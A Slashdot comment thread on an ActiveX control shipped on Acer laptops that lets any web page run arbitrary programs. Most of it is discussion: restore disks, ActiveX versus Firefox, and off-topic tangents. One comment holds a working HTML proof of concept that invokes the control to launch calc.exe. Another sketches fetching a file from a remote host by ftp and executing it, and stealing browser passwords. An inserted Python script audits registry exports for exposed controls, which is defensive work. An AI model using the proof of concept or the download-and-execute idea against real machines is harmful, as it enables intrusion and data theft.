Acer May Be Bugging Computers
tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"
Change Log
2006-11-19 - Public Release.
It's a good thing...Other companies like HP and Sony no longer include restore disks, so when a Windows user gets a virus that messes some system files up, they have to pay ridiculous amounts to order restore disks if they didn't remember to do it themselves.
Checked mine, it's present :(
Anyone know if it's safe to make that file and its registry entry 'disappear'?
My HP notebook, bought about 15 months ago not only came with restore disks, but a plain Windows XP SP2 disk and disks for WinDVD and Sonic's CD recording software.
I don't know about SONY, but in my experience, HP are more generous than most in terms of disks included with their PCs.
I bought an HP core 2 duo media center pc back in September. Came with all the software in a special partition on the first hard drive. HP has online option to purchase restore dvds for $17 (shipping). Bought the disks just because I could. I have been running Vista RC2 on this computer and do not intend to go back. Vista is much more responsive than XP. One minor annoyance is that serial ports are no longer part of computer systems these days. I need to hook up a device that only supports serial not usb. Not all vendors are in this decade.
When I was young, I had to rub sticks together to compute.
Checked mine, it's present :( Anyone know if it's safe to make that file and its registry entry 'disappear'?
Sure, just go get the Mepis Patch. This will end all of your activeX problems. It won't end your Flash, Adobe and other problems but those are minor in comparison.
Really, do you think eliminating this one control will make your computer safe? Chances are there are copies that will "respawn" later, a common malware trick, and that there are far nastier controls you don't know about. The malice is built in from Redmond before anyone else gets it.
Friends don't help friends install M$ junk.
John
I have not seen the control or have a copy of it but it can be as simple as a couple of lines of script in a web page. Now I can possibly own most Acer laptops visiting that page.
The script could do something like this
ftp somehost
ftp get somefile
execute somefile
Bingo I own your laptop.
Or say I just ftp your firefox data so I can grab your history, passwords etc.
Got Code?
Read the article: There's a trivial piece of example "exploit" code running calc.exe.
But as you can run ANY windows binary with any command line (at least according to the article), actual exploitation is trivial.
Test your net with Netalyzr
Apparently, someone in Brazil noticed this last November
The real "Libtards" are the Libertarians!
The class-id was in the article :-) D9998BD0-7957-11D2-8FED-00606730D3AA
Don't know about you, but I wouldn't call $20 a ridiculous amount to pay for a set of restore disks. And you can avoid paying the $20 or so by burning your own set of restore disks... my HP notebook prompted me to do so when I first turned it on. It just burns an image of the restore partition on the C: drive. If you forget or decide you want to do it later, it will/can remind you again in a couple days or so.
I think they were going for humor mods.
Run regsvr32 -u lunchapp.ocx from Start > Run; it will unload it without having to edit the registry.
Snowden and Manning are heroes.
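For anyone checking their own machine, an added example (not from the thread or from Acer): a Python audit of a registry export that reports, for each in-process COM class, whether it carries the safe-for-scripting category and whether IE's kill bit is set for it. It goes beyond the one control discussed here by checking every class in the export; the sample export, the file paths and the second CLSID are constructed, and it assumes the control is marked safe through the registry category.

```python
import re

# CATID_SafeForScripting: a class listing this category tells IE that any page may script it.
SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
KILL_BIT = 0x400  # bit in "Compatibility Flags" that makes IE refuse to load the control
COMPAT_KEY = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER"
              "\\ACTIVEX COMPATIBILITY\\")
SERVER_RE = re.compile(r"\\CLSID\\(\{[0-9A-F-]{36}\})\\INPROCSERVER32$")

# Constructed sample export: the CLSID quoted in the thread plus a made-up second control.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{D9998BD0-7957-11D2-8FED-00606730D3AA}\InprocServer32]
@="C:\\EXAMPLE\\lunchapp.ocx"
[HKEY_CLASSES_ROOT\CLSID\{D9998BD0-7957-11D2-8FED-00606730D3AA}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]
[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\EXAMPLE\\other.ocx"
[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000400
'''

def parse_reg(text):
    """Return {UPPERCASED key path: {value name: raw data}} from .reg export text."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].upper(), {})
        elif current is not None and "=" in line:
            name, data = line.split("=", 1)
            current[name.strip('"')] = data
    return keys

def audit(text):
    """Map each in-process COM class in the export to its IE scripting exposure."""
    keys, report = parse_reg(text), {}
    for path, values in keys.items():
        m = SERVER_RE.search(path)
        if not m:
            continue
        clsid, base = m.group(1), path[: -len("\\INPROCSERVER32")]
        safe = (base + "\\IMPLEMENTED CATEGORIES\\" + SAFE_FOR_SCRIPTING) in keys
        flags = keys.get(COMPAT_KEY + clsid, {}).get("Compatibility Flags", "dword:0")
        killed = bool(int(flags.split(":", 1)[1], 16) & KILL_BIT)
        server = values.get("@", "").strip('"').replace("\\\\", "\\")
        report[clsid] = {"server": server, "safe_for_scripting": safe,
                         "kill_bit": killed, "exposed": safe and not killed}
    return report
```

A control can also declare itself safe at run time through IObjectSafety, so a missing category key does not prove a control cannot be scripted.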
You bet. Open up a command window and type ftp; you will notice that it has a built-in ftp client. Simply calling the run method on this control in a script and you can run anything you want, download or upload anything you want just by the client browsing a web page.
Got Code?
Any mozilla extension (chrome) on mozilla/thunderbird/seamonkey/firefox/camino has access to this component which can run anything the user can.
I recently bought a laptop with Ubuntu pre-installed from The Linux Store, which is in Ontario. I've been perfectly satisfied aside from the minor point that they only offer the choice of Ubuntu and Fedora Core when I would have preferred Debian.
The right direction would be running screaming away from active X entirely.
The hatred towards ActiveX is largely unfounded. What would happen to sites like YouTube or movie sites, video, audio sites, if all browsers are suddenly rendered incapable of supporting plugins?
The mistake of Microsoft was that ActiveX were way too easy to install, and this is corrected in a major way in IE7.
In fact, the plugin API and extensions of Firefox can do just as much damage and much easier (since people trust those) than ActiveX can in IE7, with all default settings.
IE7 will at least ask you now if a page wants to run an *already installed* control. Does Firefox do this? No.
(of course there's the question: should it, but apparently due to jerks that preinstall craps on laptops, yea..)
Corrupt that extra partition and see how far that "restore" disk gets you. It's not the regular Windows restore disk that used to come with computers and it's definitely not a Windows disk. It won't work without the data on the partition.
$20 for the set of disks + $52.50(Dell refunded price for Windows) is about the same price you could buy Windows XP Home OEM version for.
This allows execution of arbitrary code... that's as bad as it gets. This could be used to do anything the computer can do. All files accessible to the current user could be uploaded somewhere else; machine could be made part of a botnet for DoS attacks; anything! Arbitrary code execution is a BAD, BAD thing.
Maybe it would make more sense if you were a three or four year old kid fascinated with fire and we gave the matches to you.
And actually the lawsuit for spilt coffee and a million bucks entailed the coffee being so hot it melted the cup where the lid fastened to it, causing the spill, after the company had been informed of the issue repeatedly and refused to do anything about it. She was only asking for medical bills and the jury added to it. So yes, in a way, I guess this kind of relates.
This type of stuff shouldn't be able to happen after how many exploits causing malicious harm to computers. I guess the solution might be for people to stop thinking they need to upgrade or replace their system whenever their computer starts acting "worn out" and "slow". If someone on the supply end stops making a buck from every replacement, they might be more concerned with stopping them from breaking.
Like multiple camera angles on DVDs? There's even a 'camera' button taking up space on my remote.
"A week in the lab saves an hour in the library"
Sony and HP don't include restore disks because they're harder to keep current than a production disk image - they're DVDs, not CDs.
:-)
All you need to do is burn the images (DVDs) when you get the laptop, and Sony positively nags you repeatedly to do it. Also, if you leave the recovery partition in place you can do it again later.
As for getting the original DVDs, they don't charge a ridiculous amount (in the $60 region) but they do ask for a ridiculous amount of proof that it's your own laptop and you're not going to share the disks with the world..
Don't know about HP, but have handled enough Sony laptops
Insert
I really have a hard time understanding your mindset. You refuse to believe in the seriousness of the vuln even when people give you an attack vector example. Please, why ?
Who's talking about an exploit? I can get people "infected" with XPI the same way people get "infected" by clicking "Yes" on that annoying ActiveX install dialog. It's much easier than trying to find an exploit. But we're drifting here - the issue is a PC vendor pre-installing something on my box. That's even easier, because it doesn't require user intervention!
but there are a number of things to prevent you from actually getting it installed.
Like what, a badly designed whitelist and a dialog where you have to click "No"? And you figure that the same people who used to click "Yes" on IE will click on "No" in Firefox, correct?
Until then, you're full of hot air.
I think you're taking this too personally. Social engineering and stupidity are far more profitable for spammers and scammers than any exploit Microsoft could ever dream of.
The twitter monologues. Click on my homepage and be amazed.
The code to test for the vulnerability, right from the Brazilian article about it linked on another post. Save it as an html file and browse it with IE.
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
I concur. I'm on my HP laptop right now, which is about 20 months old. It came with only one partition, so I had to format the entire thing when I got it to repartition it--I know I could have probably used something like Partition Magic, but I'm cheap and I wanted to uninstall all the cruft, like the Sonic garbage.
The upside is that it did come with a clean* (*HP OEM) Windows XP disk. Even though it was OEM, it gave me the option to keep most of the useless HP software off.
Beyond that, no problems yet. So I'm relatively pleased with HP for once.
I work for a major retail chain that sells HP/Compaq notebooks and desktops. HP/Compaq desktops have required you to create the recovery discs for at least 3 years now, however it was not until the August/September 2005 model refresh that they stopped shipping recovery discs with their notebooks.
We don't call pig "ham" we call it "pork".
It dates back to the Norman invasion of England, pork and beef are the Norman (French) words for those animals (porc and boeuf).
Same reason why we have redundant words like big/large.
I'm no meat scientist, but I believe this is because due to the nature of a chicken, and the various preparation methods, you can say "I want chicken!" and you get chicken. While you can be more specific, 'chicken' is sufficient.
On the other hand, if you walked into a restaurant and ordered 'Pig', you might get bacon, ham, or pork. Perhaps even a pork medallion wrapped in a strip of sweet, sweet bacon.
The variety of the animal available for consumption helps shape the ordering process. At least that's all I've got.
When I read this message what popped right on my mind was the existence of an administrator account which came pre-installed on my Acer laptop. The account is called "ASP.NET Machine A..." which is protected by a password and I'm not able to uninstall it no matter what I try. Can this be another Acer backdoor installed on their systems?
P.S.: the article's backdoor was also present on my system. Those bastards...
Slashdot, fix your code or at least hire someone who is competent at it to do it for you.
Why do we call "pig" ham and "cow" beef?
It dates back to the Norman invasion (no, not Spiney, but 1066). The (primarily Norman French) aristocracy called food by the French words -- boeuf, jambon (hence ham), etc. The stuff the peasants ate, or that nobody ate (eg horse), wasn't.
BTW, the word "poultry" is similar to the French word for chicken -- poulet.
-- Alastair